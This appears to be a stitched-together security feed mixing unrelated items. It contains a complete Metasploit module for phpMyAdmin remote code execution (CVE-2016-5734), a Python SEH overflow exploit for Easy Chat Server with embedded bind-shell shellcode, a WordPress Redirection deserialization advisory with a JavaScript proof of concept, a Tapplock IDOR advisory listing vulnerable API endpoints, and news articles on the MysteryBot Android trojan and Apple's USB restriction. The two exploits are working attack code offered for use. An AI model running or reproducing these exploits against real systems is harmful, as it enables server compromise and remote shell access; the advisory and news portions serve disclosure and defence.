phpMyAdmin 4.x Remote Code Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

# Module metadata (advisory references, payload constraints) and the datastore
# options read by check/exploit below: TARGETURI, USERNAME, PASSWORD, DATABASE.
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘phpMyAdmin Authenticated Remote Code Execution’,
‘Description’ => %q{
phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before
4.6.3 does not properly choose delimiters to prevent use of the preg_replace
(aka eval) modifier, which might allow remote attackers to execute arbitrary
PHP code via a crafted string, as demonstrated by the table search-and-replace
implementation.
},
‘Author’ =>
[
‘Michal AihaA and Cure53’, # Discovery
‘Matteo Cantoni <goony[at]nothink.org>’ # Metasploit Module
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘BID’, ‘91387’ ],
[ ‘CVE’, ‘2016-5734’ ],
[ ‘CWE’, ‘661’ ],
[ ‘URL’, ‘https://www.phpmyadmin.net/security/PMASA-2016-27/’ ],
[ ‘URL’, ‘https://security.gentoo.org/glsa/201701-32’ ],
[ ‘URL’, ‘https://www.exploit-db.com/exploits/40185/’ ],
],
‘Privileged’ => true,
‘Platform’ => [ ‘php’ ],
‘Arch’ => ARCH_PHP,
‘Payload’ =>
{
# characters the generated payload must not contain
‘BadChars’ => “&\n=+%”,
},
‘Targets’ =>
[
[ ‘Automatic’, {} ]
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Jun 23 2016’))

register_options(
[
OptString.new(‘TARGETURI’, [ true, “Base phpMyAdmin directory path”, ‘/phpmyadmin/’]),
OptString.new(‘USERNAME’, [ true, “Username to authenticate with”, ‘root’]),
OptString.new(‘PASSWORD’, [ false, “Password to authenticate with”, ”]),
OptString.new(‘DATABASE’, [ true, “Existing database at a server”, ‘phpmyadmin’])
])
end

# Fingerprints the target by fetching js/messages.php and reading the PHP and
# phpMyAdmin version strings from the response.
#
# Returns an Exploit::CheckCode:
#   Unknown  - request failed, non-200 status, or no pmaversion string in the body
#   Safe     - X-Powered-By reports PHP newer than 5.4.6, or phpMyAdmin is newer than 4.6.2
#   Appears  - phpMyAdmin 4.3.0 through 4.6.2
#   Detected - phpMyAdmin older than 4.3.0
def check
# bare rescue catches StandardError only (connection failures); signals and
# SystemExit still propagate
begin
res = send_request_cgi({ ‘uri’ => normalize_uri(target_uri.path, ‘/js/messages.php’) })
rescue
print_error(“#{peer} – Unable to connect to server”)
return Exploit::CheckCode::Unknown
end

if res.nil? || res.code != 200
print_error(“#{peer} – Unable to query /js/messages.php”)
return Exploit::CheckCode::Unknown
end

# PHP 4.3.0-5.4.6
# PHP > 5.4.6 not exploitable because null byte in regexp warning
# X-Powered-By is an optional header; when it is absent (or not in the
# PHP/x.y.z form) the code falls through to the phpMyAdmin version check
# instead of returning Safe.
php_version = res[‘X-Powered-By’]
if php_version
vprint_status(“#{peer} – PHP version: #{php_version}”)

if php_version =~ /PHP\/(\d+\.\d+\.\d+)/
# $1 is the capture from the =~ on the line above
version = Gem::Version.new($1)
vprint_status(“#{peer} – PHP version: #{version.to_s}”)
if version > Gem::Version.new(‘5.4.6’)
return Exploit::CheckCode::Safe
end
end
else
vprint_status(“#{peer} – Unknown PHP version”)
end

# 4.3.0 – 4.6.2 authorized user RCE exploit
# the phpMyAdmin version is read from the pmaversion JavaScript variable
if res.body =~ /pmaversion = ‘(\d+\.\d+\.\d+)’;/
version = Gem::Version.new($1)
vprint_status(“#{peer} – phpMyAdmin version: #{version.to_s}”)

# NOTE(review): `and` binds looser than `&&`; equivalent here because both
# operands are complete comparisons, but `&&` is the idiom
if version >= Gem::Version.new(‘4.3.0’) and version <= Gem::Version.new(‘4.6.2’)
return Exploit::CheckCode::Appears
elsif version < Gem::Version.new(‘4.3.0’)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end

return Exploit::CheckCode::Unknown
end

# Runs the module once check() returns Appears: fetch the login page for the
# CSRF token, authenticate with USERNAME/PASSWORD, confirm the session, create
# a scratch table holding a marker row in DATABASE, submit the find/replace
# request against it, then drop the table. Every fail_with() raises, so later
# steps are not reached on error.
def exploit
# check() is invoked again here; any result other than Appears aborts silently
return unless check == Exploit::CheckCode::Appears

uri = target_uri.path
vprint_status(“#{peer} – Grabbing CSRF token…”)

response = send_request_cgi({ ‘uri’ => uri})

if response.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage grabbing CSRF token”)
# the !~ match below sets $1, which is read after the if block
elsif (response.body !~ /”token”\s*value=”([^”]*)”/)
fail_with(Failure::NotFound, “#{peer} – Couldn’t find token. Is URI set correctly?”)
end

token = $1
vprint_status(“#{peer} – Retrieved token #{token}”)

vprint_status(“#{peer} – Authenticating…”)
login = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(uri, ‘index.php’),
‘vars_post’ => {
‘token’ => token,
‘pma_username’ => datastore[‘USERNAME’],
‘pma_password’ => datastore[‘PASSWORD’]
}
})

if login.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage”)
elsif login.redirect?
# A redirect is treated as a successful login; the new token is taken from
# the Location URL.
# NOTE(review): [&|$] is a character class matching a literal '&', '|' or
# '$', not "& or end of string", and (.*) is greedy, so the token is cut at
# the last such character in the URL — presumably "up to the next &" was
# intended; confirm against the redirect URLs phpMyAdmin actually emits.
token = login.redirection.to_s.scan(/token=(.*)[&|$]/).flatten.first
else
fail_with(Failure::NotFound, “#{peer} – Couldn’t find token. Wrong phpMyAdmin version?”)
end

# session cookies from the login response, reused by every request below
cookies = login.get_cookies

login_check = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘index.php’),
‘vars_get’ => { ‘token’ => token },
‘cookie’ => cookies
})

if login_check.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage”)
# “Welcome to” is presumably the login-page greeting; seeing it again means
# no session was established
elsif login_check.body =~ /Welcome to/
fail_with(Failure::NoAccess, “#{peer} – Authentication failed”)
end

vprint_status(“#{peer} – Authentication successful”)

# Create random table and column
# names are 3 to 5 lowercase letters (3+rand(3))
rand_table = Rex::Text.rand_text_alpha_lower(3+rand(3))
rand_column = Rex::Text.rand_text_alpha_lower(3+rand(3))
# marker value inserted into the table; it is reused as the ‘find’ pattern below
sql_value = ‘0%2Fe%00’

vprint_status(“#{peer} – Create random table ‘#{rand_table}’ into ‘#{datastore[‘DATABASE’]}’ database…”);

# import.php executes ‘sql_query’; encode_params is off, so the body is sent
# exactly as written here (spaces already encoded as ‘+’)
create_rand_table = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘import.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ => {
‘show_query’ => ‘0’,
‘ajax_request’ => ‘true’,
‘db’ => datastore[‘DATABASE’],
‘pos’ => ‘0’,
‘is_js_confirmed’ => ‘0’,
‘fk_checks’ => ‘0’,
‘sql_delimiter’ => ‘;’,
‘token’ => token,
‘SQL’ => ‘Go’,
‘ajax_page_request’ => ‘true’,
‘sql_query’ => “CREATE+TABLE+`#{rand_table}`+( ++++++`#{rand_column}`+varchar(10)+CHARACTER+SET”\
“+utf8+NOT+NULL ++++)+ENGINE=InnoDB+DEFAULT+CHARSET=latin1; ++++INSERT+INTO+`#{rand_table}`+”\
“(`#{rand_column}`)+VALUES+(‘#{sql_value}’); ++++”,
}
})

# a <code> block in the AJAX response appears to be how phpMyAdmin reports a
# SQL error; matched case-insensitively
if create_rand_table.nil? || create_rand_table.body =~ /(.*)<code>\\n(.*)\\n<\\\/code>(.*)/i
fail_with(Failure::Unknown, “#{peer} – Failed to create a random table”)
end

vprint_status(“#{peer} – Random table created”)

# Execute command
# the encoded PHP payload is URI-encoded before being embedded in ‘replaceWith’
command = Rex::Text.uri_encode(payload.encoded)

# NOTE(review): the response is stored but never inspected, so an HTTP error
# or a rejected request goes unreported and the module proceeds to clean up
exec_cmd = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘tbl_find_replace.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ =>{
‘columnIndex’ => ‘0’,
‘token’ => token,
‘submit’ => ‘Go’,
‘ajax_request’ => ‘true’,
‘goto’ => ‘sql.php’,
‘table’ => rand_table,
‘replaceWith’ => “eval%28%22#{command}%22%29%3B”,
‘db’ => datastore[‘DATABASE’],
‘find’ => sql_value,
‘useRegex’ => ‘on’
}
})

# Remove random table
vprint_status(“#{peer} – Remove the random table ‘#{rand_table}’ from ‘#{datastore[‘DATABASE’]}’ database”)

rm_table = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘import.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ => {
‘show_query’ => ‘0’,
‘ajax_request’ => ‘true’,
‘db’ => datastore[‘DATABASE’],
‘pos’ => ‘0’,
‘is_js_confirmed’ => ‘0’,
‘fk_checks’ => ‘0’,
‘sql_delimiter’ => ‘;’,
‘token’ => token,
‘SQL’ => ‘Go’,
‘ajax_page_request’ => ‘true’,
‘sql_query’ => “DROP+TABLE+`#{rand_table}`”
}
})

# a successful DROP TABLE yields the "empty result set" message; anything else
# is reported as a warning but does not fail the module
if rm_table.nil? || rm_table.body !~ /(.*)MySQL returned an empty result set \(i.e. zero rows\).(.*)/i
print_bad(“#{peer} – Failed to remove the table ‘#{rand_table}'”)
end
end
end

Tapplock Smart Lock Insecure Direct Object Reference

The server http://api.tapplock.com/, which serves as the API server for the Tapplock smart lock, is vulnerable to multiple authorization bypasses allowing horizontal escalation of privileges, which could lead to the disclosure of all the info of all users and total compromise of every lock. The attacker could gain access to any lock, and retrieve PII (email and street address) of any user.
There is a full write up available at : https://medium.com/@evstykas/totally-pwning-the-tapplock-smart-lock-the-api-way-c8d89915f025 <https://medium.com/@evstykas/totally-pwning-the-tapplock-smart-lock-the-api-way-c8d89915f025>

Details

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{email}?myOwner=0&page=1&size=10
http://api.tapplock.com/api/v1/shareable_users/{email}?page=1&size=10
http://api.tapplock.com/api/v1/shares/{email}?page=1&size=10
Vulnerable parameter: email

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{email}?myOwner=0&page=1&size=10
http://api.tapplock.com/api/v1/shareable_users/{email}?page=1&size=10
http://api.tapplock.com/api/v1/shares/{email}?page=1&size=10
Vulnerable parameter: email

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/finger_owners/{userUuid}?page=1&size=10
http://api.tapplock.com/api/v1/unlock_records/bluetooth/{userUuid}?page=1&size=10
http://api.tapplock.com/api/v1/finger_owners/{userUuid}?page=1&size=10
Vulnerable parameter: userUuid

Attack Vector: HTTP POST
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/users
http://api.tapplock.com/api/v1/locks
http://api.tapplock.com/api/v1/shareable_users
http://api.tapplock.com/api/v1/shares
http://api.tapplock.com/api/v1/finger_owners
http://api.tapplock.com/api/v1/fingers
http://api.tapplock.com/api/v1/fingers/actions/check
http://api.tapplock.com/api/v1/unlock_records/bluetooth
Vulnerable parameter: All the parameters that are posted on the json payload are not checked.

Attack Vector: HTTP PATCH
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/users
http://api.tapplock.com/api/v1/locks
http://api.tapplock.com/api/v1/shareable_users
Vulnerable parameter: All the parameters that are posted on the json payload are not checked.

Attack Vector: HTTP DELETE
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{lockId}
http://api.tapplock.com/api/v1/finger_owners/{uuid}
http://api.tapplock.com/api/v1/shareable_users/{shareableUserId}
http://api.tapplock.com/api/v1/shares/{shareId}
http://api.tapplock.com/api/v1/fingers/{fingerprintId}

Vulnerable parameter: All the parameters in {} are vulnerable.

New Banking Trojan Can Launch Overlay Attacks on Latest Android Versions

Researchers have discovered a new Android banking trojan that holds striking similarities to the infamous Lokibot – but packed with new tricky features, most notably its ability to implement an overlay attack on Android 7 and 8.

Researchers at ThreatFabric, who discovered the trojan, said MysteryBot was running on the same C&C server as the LokiBot Android banker discovered in 2017, suggesting that it’s either an update to the earlier malware or was developed by the same actor. The new trojan is still under development and is not widely spread, they said.

The bot comes with generic Android banking trojan functionalities – once a device is infected, for instance, the bad actor can use MysteryBot modules to make phone calls, scrape contact list info, copy keystrokes and encrypt files on external storage devices.

However, researchers said there’s much more to the story: “This bot has most generic Android banking trojan functionalities, but seems to be willing to surpass the average. The overlay, key-logging and ransomware functionalities are novel,” they said in a post. “Looking at the bot commands, we first thought that LokiBot had been improved. However, we quickly realized that there is more going on: the name of the bot and the name of the panel changed to ‘MysteryBot,’ [and] even the network communication changed.”

A ThreatFabric spokesperson told Threatpost that at the moment the trojan is spread via phishing while side-loading the payload. “The commonly fake Flash Player social-engineering trick is used in the distribution campaign,” said the spokesperson.

ThreatFabric discovered MysteryBot two weeks ago, and while researchers can’t say that it has been very active (less than 200 infections), they told us they believe that it will be properly spread once it is fully functional. 

One unique component to MysteryBot is its approach to overlay attacks, which enables attackers to draw on top of other apps running on the infected devices. This means they could overlay phishing pages on top of legitimate apps.

Android 7 and 8 have security protections like Security-Enhanced Linux (SELinux) built in, rendering previously used overlay techniques inaccessible, said researchers. These protections stop malware from showing off fake pages over apps. That has left malware families like ExoBot 2.5 and DiseaseBot searching for new overlay techniques – but MysteryBot appears to have found a solution.

Specifically, the bot abuses a glitch in the Android PACKAGE_USAGE_STATS service permission (a.k.a. the “Usage Access” permission), which is an Android software feature that shows stats revolving around usage of apps. Usually the victim has to provide specific permissions for usage – but MysteryBot employs AccessibilityService, which allows it to abuse any required permission without the victim’s consent. Android said that accessibility services are typically used to assist users with disabilities in using Android devices and apps.

Interestingly, it asks victims to grant Accessibility Service permissions after installing the malware.

“It seems that the reason for the victims to grant such permissions [is] the number of benign apps nowadays asking for exhaustive sets of permissions — making it common for users to grant permissions without reviewing the permissions requested,” the researchers said. “At the moment, MysteryBot is not using such an M.O. to get the Usage Access permission, but will ask the victim for it directly.”

The bot has abused this feature to target overlay attacks against over 100 apps, including WhatsApp and Facebook.

Other Features

The bot also appears to have innovated keylogging functionalities, effectively lowering detection rates and limiting the user interaction required to enable the logger.

While most trojans abuse the Android Accessibility Service to log the keystrokes or make screenshots upon key-presses, MysteryBot’s logging mechanism uses the Accessibility Service permission to do so directly after installing the malware.

The method essentially calculates the location for each row and places a “View” over each key. Each “view” is then paired to a specific key in such a way that it can register the keys that have been pressed which are then saved for further use, researchers said.

While this technique requires more user interaction (i.e., asking for Accessibility Service permission) to be successful, it also has potential to log more than the usual keystrokes.

“At the time of writing, the code for the keylogger seems to still be under development, as there is no method yet to send the logs to the C2 server,” researchers said.

Moving forward, the enhanced overlay attack capability can be used to run on the latest Android versions; this, combined with the advanced keylogging features, will enable MysteryBot “to harvest a broad set of personally identifiable information in order to perform fraud,” researchers said.

MysteryBot also packs a ransomware module, which includes a new capability that allows the trojan to encrypt all files individually in the external storage directory, including every sub directory. After that, the original files are deleted.

As part of this, the trojan can delete the contacts in the contact list of the infected device, something that researchers said was not observed in banking malware until now.

“In the last six months we observed that capabilities such as a proxy, keylogging, remote access (RAT), sound-recording and file-uploading have become more and more common; we suspect this trend to only grow in the future,” researchers said.  “If our expectation of increases in such behavior turns out to be true, it means that it will become difficult for financial institutions to assess whether or not they are targeted by the specific threats…all infected devices can be source of fraud and espionage.”

WordPress Redirection 2.7.1 Deserialization Code Execution

Details
================
Software: Redirection
Version: 2.7.1
Homepage: https://wordpress.org/plugins/redirection/
Advisory report: https://advisories.dxw.com/advisories/unserialization-redirection/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description
================
Unserialization vulnerability in Redirection could allow admin to execute arbitrary code in some circumstances

Vulnerability
================
It is possible for a user with the administrator privilege to submit a string that contains an encoded object that executes arbitrary code of the attacker's choosing.
The value can be passed in with an AJAX request to admin-ajax.php using the red_ajax_set_redirect action that is passed to the ajax_set_redirect method in this code:
public function ajax_set_redirect( $params ) {
$params = $this->get_params( $params );
….
$result = $redirect->update( $params );
}

// Returns the caller-supplied parameters, falling back to the raw $_POST
// array when none were given. No filtering happens here; whatever the
// request contained is handed on to update().
private function get_params( $params ) {
if ( empty( $params ) ) {
$params = $_POST;
}
return $params;
}

The update method then passes the attack string to this code:
class Red_Item {
// Excerpt: $sanitizer is defined outside the quoted code. The sanitized
// array is cast to an object and every member is copied onto $this by
// load_from_data().
public function update( $details ) {
$data = $sanitizer->get( $details );
$this->load_from_data( (object) $data );
}

// Copies every key of $values onto a same-named property of this object,
// including action_data, which the advisory text states the sanitizer does
// not touch.
private function load_from_data( stdClass $values ) {
foreach ( $values as $key => $value ) {
$this->$key = $value; }
}
The sanitizer does not sanitize the action_data value. Many calls to this class then use its to_json method, which is as follows:
// Returns the stored action_data string, or an empty string when unset.
// to_json() passes this value to maybe_unserialize() (see below).
public function get_action_data() {
return $this->action_data ? $this->action_data : \’\’;
}

public function to_json() {
maybe_unserialize( $this->get_action_data() ),
}

The sum effect is therefore that unsanitized user input is being passed to maybe_unserialize().

Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It may not be possible in all situations. As such, this PoC will merely attempt to show that an arbitrary string can be passed to the maybe_unserialize() function.

Visit /wp-admin/tools.php?page=redirection.php
Create a new redirect with '/boo', 'https://www.dxw.com/', and 'Redirections'.
We'll assume this redirect was given an ID of 1 in the wp_redirection_items table. If that isn't true, change the 'id' value in the provided JavaScript.
Then, without leaving the page, open your browser's console and execute this JavaScript:
// Advisory PoC, run from an authenticated administrator session: posts a
// serialized stdClass string as action_data. A response containing
// {hello: "world"} shows the raw string reached maybe_unserialize(); no
// code execution is attempted.
// NOTE(review): the text above names the action red_ajax_set_redirect while
// this request posts red_set_redirect — confirm which name the plugin registers.
jQuery.ajax(ajaxurl,{
method: \’POST\’,
data: {
\’action\’: \’red_set_redirect\’,
\’_wpnonce\’: window.Redirectioni10n.WP_API_nonce,
\’id\’: \’1\’,
\’match_type\’: \’url\’,
\’action_code\’: \’1\’,
\’action_type\’: \’url\’,
\’url\’: \’https://www.dxw.com/\’,
\’group_id\’: \’1\’,
\’action_data\’: \’O:8:\”stdClass\”:1:{s:5:\”hello\”;s:5:\”world\”;}\’,
},
}).done(console.log)
Then, by inspecting the JavaScript object printed by console.log, or by looking at the Network logs, you'll notice that we have a {'hello': 'world'} JavaScript object, showing that our arbitrary string was passed to unserialize() and therefore, if the correct classes were available, we would be able to turn this into arbitrary code execution.

Mitigations
================
Upgrade to version 2.8 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://advisories.dxw.com/disclosure/

Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2017-10-02: Discovered
2017-10-03: Reported via website contact form
2017-10-04: Response received. Author has asked for PoC: "The value for action_data is sanitised when it is passed through Red_Item_Sanitize"
2017-10-09: Developed a PoC
2017-10-10: Working PoC provided to author.
2017-10-18: Author reported fixed in 2.8
2018-06-06: Advisory published
2018-06-12: CVE requested

Discovered by dxw:
================
Glyn Wintle
Please visit advisories.dxw.com for more information.

Easy Chat Server 3.1 Add User Local Buffer Overflow

#!/usr/bin/env python
#———————————————————————————————————-#
# Exploit Title : Easy Chat Server 3.1 – ‘Add user’ Local Buffer Overflow #
# Exploit Author : Hashim Jawad – @ihack4falafel #
# Vendor Homepage : http://www.echatserver.com/index.htm #
# Vulnerable Software: http://www.echatserver.com/ecssetup.exe #
# Tested on : Windows 7 Enterprise SP1 (x64) #
# Steps to reproduce : paste contents of Evil.txt in ‘Name:’ field under Add user and click OK #
#———————————————————————————————————-#

# msfvenom -p windows/shell_bind_tcp -b ‘\x00\x0a\x0d’ -e x86/alpha_mixed -f python -v shellcode
# Payload size: 718 bytes
shellcode = “”
shellcode += “\x89\xe3\xda\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49”
shellcode += “\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43”
shellcode += “\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30”
shellcode += “\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30”
shellcode += “\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49”
shellcode += “\x79\x6c\x6a\x48\x6b\x32\x53\x30\x73\x30\x77\x70”
shellcode += “\x43\x50\x4e\x69\x7a\x45\x36\x51\x79\x50\x61\x74”
shellcode += “\x4e\x6b\x52\x70\x76\x50\x6e\x6b\x62\x72\x44\x4c”
shellcode += “\x4c\x4b\x51\x42\x72\x34\x4c\x4b\x71\x62\x66\x48”
shellcode += “\x76\x6f\x4d\x67\x63\x7a\x45\x76\x50\x31\x4b\x4f”
shellcode += “\x6c\x6c\x65\x6c\x75\x31\x63\x4c\x77\x72\x44\x6c”
shellcode += “\x35\x70\x4a\x61\x68\x4f\x74\x4d\x63\x31\x5a\x67”
shellcode += “\x69\x72\x5a\x52\x76\x32\x46\x37\x6e\x6b\x52\x72”
shellcode += “\x44\x50\x6e\x6b\x30\x4a\x75\x6c\x6e\x6b\x62\x6c”
shellcode += “\x66\x71\x73\x48\x68\x63\x77\x38\x67\x71\x58\x51”
shellcode += “\x66\x31\x6c\x4b\x31\x49\x31\x30\x46\x61\x59\x43”
shellcode += “\x6c\x4b\x37\x39\x56\x78\x7a\x43\x45\x6a\x50\x49”
shellcode += “\x4c\x4b\x74\x74\x6e\x6b\x53\x31\x6a\x76\x66\x51”
shellcode += “\x69\x6f\x6e\x4c\x59\x51\x4a\x6f\x44\x4d\x76\x61”
shellcode += “\x6a\x67\x64\x78\x6b\x50\x70\x75\x4a\x56\x44\x43”
shellcode += “\x63\x4d\x48\x78\x77\x4b\x51\x6d\x67\x54\x52\x55”
shellcode += “\x59\x74\x70\x58\x4e\x6b\x66\x38\x65\x74\x55\x51”
shellcode += “\x68\x53\x63\x56\x6e\x6b\x56\x6c\x70\x4b\x4e\x6b”
shellcode += “\x52\x78\x45\x4c\x35\x51\x38\x53\x6c\x4b\x56\x64”
shellcode += “\x6c\x4b\x67\x71\x4a\x70\x6f\x79\x73\x74\x71\x34”
shellcode += “\x45\x74\x73\x6b\x43\x6b\x31\x71\x73\x69\x51\x4a”
shellcode += “\x70\x51\x59\x6f\x4d\x30\x51\x4f\x73\x6f\x33\x6a”
shellcode += “\x4e\x6b\x36\x72\x58\x6b\x6c\x4d\x33\x6d\x31\x78”
shellcode += “\x70\x33\x57\x42\x47\x70\x43\x30\x35\x38\x30\x77”
shellcode += “\x33\x43\x46\x52\x53\x6f\x36\x34\x61\x78\x42\x6c”
shellcode += “\x63\x47\x54\x66\x36\x67\x59\x6f\x58\x55\x6d\x68”
shellcode += “\x4e\x70\x53\x31\x55\x50\x77\x70\x35\x79\x7a\x64”
shellcode += “\x50\x54\x30\x50\x65\x38\x55\x79\x6b\x30\x62\x4b”
shellcode += “\x53\x30\x39\x6f\x5a\x75\x43\x5a\x33\x38\x66\x39”
shellcode += “\x52\x70\x79\x72\x59\x6d\x51\x50\x76\x30\x51\x50”
shellcode += “\x66\x30\x35\x38\x79\x7a\x66\x6f\x69\x4f\x59\x70”
shellcode += “\x39\x6f\x79\x45\x6f\x67\x35\x38\x66\x62\x63\x30”
shellcode += “\x54\x51\x71\x4c\x4d\x59\x49\x76\x52\x4a\x56\x70”
shellcode += “\x66\x36\x76\x37\x33\x58\x78\x42\x6b\x6b\x56\x57”
shellcode += “\x55\x37\x69\x6f\x79\x45\x31\x47\x33\x58\x68\x37”
shellcode += “\x79\x79\x34\x78\x4b\x4f\x4b\x4f\x49\x45\x46\x37”
shellcode += “\x35\x38\x61\x64\x38\x6c\x57\x4b\x69\x71\x69\x6f”
shellcode += “\x4b\x65\x42\x77\x4f\x67\x33\x58\x44\x35\x32\x4e”
shellcode += “\x32\x6d\x55\x31\x59\x6f\x78\x55\x65\x38\x30\x63”
shellcode += “\x52\x4d\x42\x44\x57\x70\x4b\x39\x79\x73\x63\x67”
shellcode += “\x33\x67\x30\x57\x36\x51\x59\x66\x73\x5a\x46\x72”
shellcode += “\x43\x69\x50\x56\x49\x72\x79\x6d\x51\x76\x58\x47”
shellcode += “\x33\x74\x67\x54\x47\x4c\x76\x61\x66\x61\x4c\x4d”
shellcode += “\x57\x34\x54\x64\x62\x30\x78\x46\x77\x70\x33\x74”
shellcode += “\x70\x54\x42\x70\x70\x56\x73\x66\x30\x56\x42\x66”
shellcode += “\x32\x76\x50\x4e\x61\x46\x63\x66\x52\x73\x42\x76”
shellcode += “\x61\x78\x63\x49\x78\x4c\x75\x6f\x4e\x66\x6b\x4f”
shellcode += “\x4e\x35\x4f\x79\x69\x70\x52\x6e\x70\x56\x43\x76”
shellcode += “\x69\x6f\x64\x70\x35\x38\x75\x58\x6b\x37\x45\x4d”
shellcode += “\x33\x50\x69\x6f\x5a\x75\x6f\x4b\x7a\x50\x58\x35”
shellcode += “\x6d\x72\x33\x66\x71\x78\x6d\x76\x6f\x65\x4f\x4d”
shellcode += “\x6d\x4d\x69\x6f\x4b\x65\x35\x6c\x35\x56\x73\x4c”
shellcode += “\x64\x4a\x6d\x50\x6b\x4b\x69\x70\x70\x75\x67\x75”
shellcode += “\x6d\x6b\x77\x37\x36\x73\x42\x52\x32\x4f\x51\x7a”
shellcode += “\x77\x70\x32\x73\x39\x6f\x6b\x65\x41\x41”

# Contents of Evil.txt, 5000 bytes in total: 217 bytes of padding, the 4-byte
# nSEH and 4-byte SEH fields, a 10-byte NOP sled, the shellcode built above,
# then filler so the total length is exactly 5000. The per-line comments are
# the author's; the addresses were taken against the environment named in
# the header.
buffer = ‘\xcc’ * 217 # offset to nSEH
buffer += ‘\x75\x06\x74\x06’ # nSEH | jump net
buffer += ‘\x21\x7f\x01\x10’ # SEH | 0x10017f21 : pop esi # pop ecx # ret | [SSLEAY32.dll]
buffer += ‘\x90’ * 10 # nop sled
buffer += shellcode # bind shell
buffer += ‘\xcc’ * (5000-217-4-4-10-len(shellcode)) # junk

# Writes the buffer to Evil.txt in the working directory (Python 2 print
# syntax). Any exception is printed rather than re-raised, so a failed write
# only shows up as the missing "[+] File created!" line.
try:
    f=open(“Evil.txt”,”w”)
    print “[+] Creating %s bytes evil payload..” %len(buffer)
    f.write(buffer)
    f.close()
    print “[+] File created!”
except Exception as e:
    print e

Apple Removes iPhone USB Access Feature, Blocking Out Hackers, Law Enforcement

Apple said an upcoming iOS software update will remove the infamous iPhone USB access feature, blocking out both hackers – and law enforcement – from accessing a locked phones’ data via the device port.

Apple confirmed that new upcoming default settings will disable the iPhone’s Lightning port, its charging and data port, an hour after the iPhone has been unlocked.

“At Apple, we put the customer at the center of everything we design,” an Apple spokesperson told Threatpost in an email. “We’re constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data.”

This means that users can still charge their phones, but will not be able to continue to transfer data to and from their device until they enter the passcode.

The move blocks off several devices (some of which have been used by federal law enforcement agencies) that have been designed to hack into iPhones via the Lightning port.

One such device, called the GrayKey box, has been known to unlock iPhones using the Lightning port to install software that cracks the passcode of an iOS device. Reports have found that several federal agencies – such as the FBI – have used the device, made by a company called Grayshift, to unlock up-to-date iPhones.

The move may also protect against Cellebrite’s UFED devices, forensic tools for iPhones and iPads that can reportedly unlock iOS devices.

“The fact is that this method of access presents a vulnerability, and Apple has made a calculated decision that they’ll see a better return on fixing that vulnerability than continuing to allow it to be exploited,” Tim Erlin, VP product management and strategy at Tripwire, said in an email to Threatpost.

In beta versions of iOS 11.4, Apple had first introduced a rudimentary version of the feature called USB Restricted Mode. This feature disabled USB access to the Lightning Connector after seven days.

In the case of USB Restricted Mode, the Apple spokesperson told Threatpost the company  learned that possible vulnerabilities exist in how iOS handles USB devices, and thus commenced a thorough review of the code, improving the security of many pieces of the USB stack.

The Apple spokesperson said additional mitigation was added which would remove the USB as an attack surface when customers don’t need it, without negatively impacting the user experience.

Apple told Reuters it will be permanently available in a forthcoming OS release.

Apple’s Rocky Past With FBI

Apple has had a long bumpy history with federal law enforcement when it comes to unlocking iPhones.

That conflict escalated in 2016, when Apple refused to comply with an FBI request to unlock the iPhone of the San Bernardino gunman who killed 14 people in 2015.

